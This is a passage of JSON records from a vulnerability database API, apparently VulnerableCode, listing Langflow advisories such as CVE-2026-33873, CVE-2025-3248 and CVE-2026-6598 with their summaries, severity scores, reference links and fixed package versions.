"resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u8mw-7znw-rfab" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37257?format=api", "vulnerability_id": "VCID-v5pc-pdm9-97g8", "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33873", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20469", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33873" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33873", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33873" }, { "reference_url": "https://github.com/advisories/GHSA-v8hw-mh8c-jxfc", "reference_id": "GHSA-v8hw-mh8c-jxfc", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-v8hw-mh8c-jxfc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48845?format=api", "purl": "pkg:pypi/langflow@1.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ypxh-x2hy-3uhb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0" } ], "aliases": [ "CVE-2026-33873", "GHSA-v8hw-mh8c-jxfc", "PYSEC-2026-82" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v5pc-pdm9-97g8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37041?format=api", "vulnerability_id": "VCID-wv26-29b9-vqgg", "summary": "Langflow versions prior to 1.3.0 are susceptible to code injection in \nthe /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary\ncode.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-3248", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.92665", "scoring_system": "epss", "scoring_elements": "0.9976", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-3248" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/6911", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/" } ], "url": "https://github.com/langflow-ai/langflow/pull/6911" }, { "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/" } ], "url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0" }, { "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248" }, { "reference_url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai" }, { "reference_url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/" } ], "url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/" }, { "reference_url": "https://www.vulncheck.com/advisories/langflow-unauthenticated-rce", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/" } ], "url": "https://www.vulncheck.com/advisories/langflow-unauthenticated-rce" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt", "reference_id": "CVE-2025-3248", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py", "reference_id": "CVE-2025-3248", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248", "reference_id": "CVE-2025-3248", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248" }, { "reference_url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7", "reference_id": "GHSA-rvqx-wpfh-mfx7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7", "reference_id": "GHSA-rvqx-wpfh-mfx7", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/44832?format=api", "purl": "pkg:pypi/langflow@1.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1dek-kvzf-27d1" }, { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-fc5h-qc2t-xqc3" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0" } ], "aliases": [ "CVE-2025-3248", "GHSA-rvqx-wpfh-mfx7", "PYSEC-2025-36" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wv26-29b9-vqgg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89018?format=api", "vulnerability_id": "VCID-ypxh-x2hy-3uhb", "summary": "Langflow: Cleartext Storage of Authentication Settings in Project Creation Endpoint\nA security vulnerability has been detected in langflow-ai langflow up to 1.8.3. The affected element is the function create_project/encrypt_auth_settings of the file src/backend/base/Langflow/api/v1/projects.py of the component Project Creation Endpoint. Such manipulation of the argument auth_settings leads to cleartext storage in a file or on disk. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6598", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02941", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6598" }, { "reference_url": "https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "4.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/" } ], "url": 